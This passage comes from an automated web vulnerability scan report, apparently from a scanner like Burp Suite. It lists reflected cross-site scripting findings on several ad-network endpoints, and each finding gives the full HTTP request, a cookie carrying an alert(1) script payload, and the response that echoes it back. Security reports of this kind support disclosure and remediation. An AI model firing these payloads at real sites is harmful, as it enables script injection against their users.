9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&9c5ea<script>alert(1)</script>e3d7f402293' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

4.269. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload dbe49<script>alert(1)</script>2bcbe298ec2 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&dbe49<script>alert(1)</script>2bcbe298ec2; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:41 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:41 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:41 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&dbe49<script>alert(1)</script>2bcbe298ec2', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1307964392%2E087%2Cwait%2D%3E35000%2C', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "a
...[SNIP]...

4.270. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 7fc80<script>alert(1)</script>142b000f4f2 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&7fc80<script>alert(1)</script>142b000f4f2; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:40 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
80915&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1307964392%2E087%2Cwait%2D%3E35000%2C', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&7fc80<script>alert(1)</script>142b000f4f2', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...

4.271. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload e020d<script>alert(1)</script>9a75c8d5853 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&e020d<script>alert(1)</script>9a75c8d5853; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:40 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
62&arc=42330646&', "BMX_BR": 'pid=p20101109&prad=11794&arc=15313&exp=1307963601', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&e020d<script>alert(1)</script>9a75c8d5853', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://pho
...[SNIP]...

4.272. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload d2d3a<script>alert(1)</script>a9c467428eb was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&d2d3a<script>alert(1)</script>a9c467428eb; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:41 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:41 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:41 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
y 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&d2d3a<script>alert(1)</script>a9c467428eb', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1307964392%2E087%2Cwait%2D%3E35000%2C',
...[SNIP]...

4.273. http://d.chango.com/collector/admeldpixel [_t cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.chango.com
Path:	/collector/admeldpixel

Issue detail

The value of the _t cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74503'-alert(1)-'bf5dd2ae0ce was submitted in the _t cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e474503'-alert(1)-'bf5dd2ae0ce

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "30e407947b93249e99d5591c5ba4fdaf230a2e18"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e474503'-alert(1)-'bf5dd2ae0ce; Domain=chango.com; expires=Thu, 10 Jun 2021 11:24:16 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:24:16 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e474503'-alert(1)-'bf5dd2ae0ce';

4.274. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5113b"-alert(1)-"f65b7b765f7 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~0514115113b"-alert(1)-"f65b7b765f7; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:08:08 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=104
Expires: Mon, 13 Jun 2011 11:09:52 GMT
Date: Mon, 13 Jun 2011 11:08:08 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

var zzStr = "s=1;u=lYrOTcGt89Yz1ao6zwEmLiof~0514115113b"-alert(1)-"f65b7b765f7;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.275. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257d5"-alert(1)-"4a6903092fc was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411257d5"-alert(1)-"4a6903092fc; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:08:05 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=47
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:08:05 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

var zzStr = "s=1;u=lYrOTcGt89Yz1ao6zwEmLiof~051411257d5"-alert(1)-"4a6903092fc;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.276. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.mtv/ent_010111

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73d3"%3balert(1)//8100ae70af7 was submitted in the cli cookie. This input was echoed as c73d3";alert(1)//8100ae70af7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=388700;cmpgurl=http%253A//view.atdmt.com/PTR/iview/240321409/direct%253Bwi.1%253Bhi.1/01%253Frelocate%253Dhttp%253A//viacom.adbureau.net/AFTRSERVER/hserver//acc_random%253D379297/site%253Dmtv.mtvi/aamsz%253D728x90/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dcc73d3"%3balert(1)//8100ae70af7; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
